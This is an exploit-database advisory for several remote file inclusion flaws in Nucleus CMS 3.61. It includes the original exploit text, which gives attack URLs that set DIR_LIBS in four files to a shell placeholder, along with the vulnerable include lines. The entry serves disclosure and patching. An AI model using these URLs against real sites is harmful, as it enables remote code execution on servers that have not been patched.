Nucleus v3.61 Multiple Remote File Include

vendor:

Nucleus CMS

by:

n0n0x

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Nucleus CMS

Affected Version From: 3.61

Affected Version To: 3.61

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Nucleus v3.61 Multiple Remote File Include

Nucleus CMS version 3.61 is vulnerable to multiple Remote File Include (RFI) vulnerabilities. The vulnerable files are action.php, media.php, server.php and PLUGINADMIN.php. An attacker can exploit these vulnerabilities by sending a malicious URL to the application. This URL contains the malicious payload which is then executed on the server.

Mitigation:

Upgrade to the latest version of Nucleus CMS.

Source

Exploit-DB raw data:

#######################################################
#Nucleus v3.61 <=== Multiple Remote File Include
#By n0n0x
#Homepage: http://priasantai.uni.cc/
#Download script :http://sourceforge.net/projects/nucleuscms/
#######################################################
=========================================
nucleus3.61/action.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????

13. /**
14.  * File containing actions that can be performed by visitors of the site,
15.  * like adding comments, etc...
16.  * @license http://nucleuscms.org/license.txt GNU General Public License
17.  * @copyright Copyright (C) 2002-2009 The Nucleus Group
18.  * @version $Id: action.php 1388 2009-07-18 06:31:28Z shizuki $
19.  */
20.
21. $CONF = array();
22. require('./config.php');
23.
24. // common functions
25. include_once($DIR_LIBS . 'ACTION.php');  <=== RFI vuln

==========================================
nucleus3.61/nucleus/media.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????

35. // include all classes and config data
36. require('../config.php');
37. include($DIR_LIBS . 'MEDIA.php');	// media classes

==========================================
nucleus3.61/nucleus/xmlrpc/server.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????

63.  * @license http://nucleuscms.org/license.txt GNU General Public License
64.  * @copyright Copyright (C) 2002-2009 The Nucleus Group
67.  * @version $Id: server.php 1388 2009-07-18 06:31:28Z shizuki $
68.  */
69. $CONF = array();
70. require("../../config.php");	// include Nucleus libs and code
71. include($DIR_LIBS . "xmlrpc.inc.php");

==========================================
nucleus3.61/nucleus/libs/PLUGINADMIN.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????

class PluginAdmin {

	var $strFullName;		// NP_SomeThing
	var $plugin;			// ref. to plugin object
	var $bValid;			// evaluates to true when object is considered valid
	var $admin;				// ref to an admin object

	function PluginAdmin($pluginName)
	{
		global $manager;
                include_once($DIR_LIBS . 'ADMIN.php');   

==========================================
################################################
Greetz: all member | manadocoding.org - sekuritiOnline.net

friends: str0ke, angky.tatoki, EA ngel, bL4Ck_3n91n3,  0pa, x0r0n, team_elite
            devilbat. cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet
################################################